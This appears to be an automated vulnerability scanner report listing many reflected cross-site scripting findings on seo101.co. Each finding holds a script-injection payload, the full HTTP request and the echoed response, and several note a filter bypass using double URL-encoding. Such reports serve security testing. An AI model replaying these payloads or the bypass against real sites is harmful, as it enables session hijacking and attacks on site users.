<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/pr64d84\"><script>alert(1)</script>72775ac808d/1/pr5.gif seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d0ec9%253balert%25281%2529%252f%252f754bd66a136 was submitted in the REST URL parameter 5. This input was echoed as d0ec9;alert(1)//754bd66a136 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1d0ec9%253balert%25281%2529%252f%252f754bd66a136/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/pr/1d0ec9;alert(1)//754bd66a136/pr5.gif SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1db7b"><script>alert(1)</script>3c5c586d294 was submitted in the REST URL parameter 5. This input was echoed as 1db7b\"><script>alert(1)</script>3c5c586d294 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/11db7b"><script>alert(1)</script>3c5c586d294/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/pr/11db7b\"><script>alert(1)</script>3c5c586d294/pr5.gif seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9a984%253balert%25281%2529%252f%252f3cc40906233 was submitted in the REST URL parameter 6. This input was echoed as 9a984;alert(1)//3cc40906233 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif9a984%253balert%25281%2529%252f%252f3cc40906233 HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/pr/1/pr5.gif9a984;alert(1)//3cc40906233 SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb9b1"><script>alert(1)</script>dec17e82b5e was submitted in the REST URL parameter 6. This input was echoed as fb9b1\"><script>alert(1)</script>dec17e82b5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.giffb9b1"><script>alert(1)</script>dec17e82b5e HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/pr/1/pr5.giffb9b1\"><script>alert(1)</script>dec17e82b5e seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a3eb</script><script>alert(1)</script>94b5fac151e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C9a3eb</script><script>alert(1)</script>94b5fac151e/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c5e8"><script>alert(1)</script>7ad64fba9e8 was submitted in the REST URL parameter 1. This input was echoed as 7c5e8\"><script>alert(1)</script>7ad64fba9e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C7c5e8"><script>alert(1)</script>7ad64fba9e8/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload f4813><script>alert(1)</script>f547a5adbb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Cf4813><script>alert(1)</script>f547a5adbb5/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 18d34%253balert%25281%2529%252f%252fa8813a39408 was submitted in the REST URL parameter 2. This input was echoed as 18d34;alert(1)//a8813a39408 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C18d34%253balert%25281%2529%252f%252fa8813a39408/img/today.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <18d34;alert(1)//a8813a39408/img/today.png SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 886ff><script>alert(1)</script>f494c8a10a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/886ff><script>alert(1)</script>f494c8a10a0/img/today.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</886ff><script>alert(1)</script>f494c8a10a0/img/today.png SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 213dd"><script>alert(1)</script>7992ca893d was submitted in the REST URL parameter 2. This input was echoed as 213dd\"><script>alert(1)</script>7992ca893d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C213dd"><script>alert(1)</script>7992ca893d/img/today.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <213dd\"><script>alert(1)</script>7992ca893d/img/today.png seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d8c3f%253balert%25281%2529%252f%252f4367197c4a2 was submitted in the REST URL parameter 3. This input was echoed as d8c3f;alert(1)//4367197c4a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imgd8c3f%253balert%25281%2529%252f%252f4367197c4a2/today.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </imgd8c3f;alert(1)//4367197c4a2/today.png SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b05ed"><script>alert(1)</script>53321847c31 was submitted in the REST URL parameter 3. This input was echoed as b05ed\"><script>alert(1)</script>53321847c31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imgb05ed"><script>alert(1)</script>53321847c31/today.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </imgb05ed\"><script>alert(1)</script>53321847c31/today.png seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 110d3%253balert%25281%2529%252f%252feb8d1b26650 was submitted in the REST URL parameter 4. This input was echoed as 110d3;alert(1)//eb8d1b26650 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png110d3%253balert%25281%2529%252f%252feb8d1b26650 HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/today.png110d3;alert(1)//eb8d1b26650 SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec158"><script>alert(1)</script>fffcaaaa68f was submitted in the REST URL parameter 4. This input was echoed as ec158\"><script>alert(1)</script>fffcaaaa68f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.pngec158"><script>alert(1)</script>fffcaaaa68f HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/today.pngec158\"><script>alert(1)</script>fffcaaaa68f seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5f69"><script>alert(1)</script>501bf8a42dd was submitted in the REST URL parameter 1. This input was echoed as e5f69\"><script>alert(1)</script>501bf8a42dd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Ce5f69"><script>alert(1)</script>501bf8a42dd/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2d49</script><script>alert(1)</script>0cd56afdb20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Cc2d49</script><script>alert(1)</script>0cd56afdb20/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload fedf6><script>alert(1)</script>7b52451862d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Cfedf6><script>alert(1)</script>7b52451862d/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 7e5f4><script>alert(1)</script>46e7cca4e15 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/7e5f4><script>alert(1)</script>46e7cca4e15/img/total.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</7e5f4><script>alert(1)</script>46e7cca4e15/img/total.png SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8c8d"><script>alert(1)</script>53d4fbe7a9e was submitted in the REST URL parameter 2. This input was echoed as f8c8d\"><script>alert(1)</script>53d4fbe7a9e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cf8c8d"><script>alert(1)</script>53d4fbe7a9e/img/total.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <f8c8d\"><script>alert(1)</script>53d4fbe7a9e/img/total.png seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f3bbe%253balert%25281%2529%252f%252f26b976fe45e was submitted in the REST URL parameter 2. This input was echoed as f3bbe;alert(1)//26b976fe45e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cf3bbe%253balert%25281%2529%252f%252f26b976fe45e/img/total.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <f3bbe;alert(1)//26b976fe45e/img/total.png SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e78cd"><script>alert(1)</script>b046ed0c2ea was submitted in the REST URL parameter 3. This input was echoed as e78cd\"><script>alert(1)</script>b046ed0c2ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imge78cd"><script>alert(1)</script>b046ed0c2ea/total.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </imge78cd\"><script>alert(1)</script>b046ed0c2ea/total.png seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bc8c5%253balert%25281%2529%252f%252ff4f7b22376 was submitted in the REST URL parameter 3. This input was echoed as bc8c5;alert(1)//f4f7b22376 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
